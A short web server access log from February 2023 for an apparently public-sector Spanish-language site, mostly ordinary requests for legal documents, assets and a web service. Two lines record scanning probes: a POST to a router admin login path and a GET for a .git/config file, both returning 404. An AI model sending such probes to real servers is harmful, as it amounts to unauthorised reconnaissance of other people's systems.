172.22.2.4 - - [11/Feb/2023:08:36:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
35.204.11.149 - - [11/Feb/2023:08:38:10 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [11/Feb/2023:08:38:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:08:38:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41269
201.245.192.253 - - [11/Feb/2023:08:38:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41460
40.77.167.251 - - [11/Feb/2023:08:38:36 -0500] "GET /bla/resoluciones/autos%202021/0766.pdf HTTP/1.1" 200 887120
49.249.49.226 - - [11/Feb/2023:08:39:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2910.pdf HTTP/1.1" 200 415694
49.249.49.226 - - [11/Feb/2023:08:39:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2910.pdf HTTP/1.1" 200 415694
49.249.49.226 - - [11/Feb/2023:08:40:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2910.pdf HTTP/1.1" 200 415694
201.245.192.253 - - [11/Feb/2023:08:40:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.246.220.98 - - [11/Feb/2023:08:41:14 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
52.167.144.97 - - [11/Feb/2023:08:41:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438284
186.71.34.165 - - [11/Feb/2023:08:42:40 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.71.34.165 - - [11/Feb/2023:08:42:40 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.71.34.165 - - [11/Feb/2023:08:42:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [11/Feb/2023:08:41:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Feb/2023:08:43:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:42:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
66.249.64.47 - - [11/Feb/2023:08:43:58 -0500] "-" 408 -
172.121.217.235 - - [11/Feb/2023:08:44:48 -0500] "HEAD / HTTP/1.1" 200 -
52.26.21.145 - - [11/Feb/2023:08:44:52 -0500] "GET / HTTP/1.1" 200 319
52.26.21.145 - - [11/Feb/2023:08:44:52 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [11/Feb/2023:08:45:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [11/Feb/2023:08:48:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:48:51 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
172.22.2.4 - - [11/Feb/2023:08:47:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:48:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [11/Feb/2023:08:50:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
114.119.152.71 - - [11/Feb/2023:08:51:10 -0500] "-" 408 -
172.22.2.4 - - [11/Feb/2023:08:51:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9606
172.22.2.4 - - [11/Feb/2023:08:51:40 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [11/Feb/2023:08:51:40 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [11/Feb/2023:08:51:40 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [11/Feb/2023:08:51:40 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
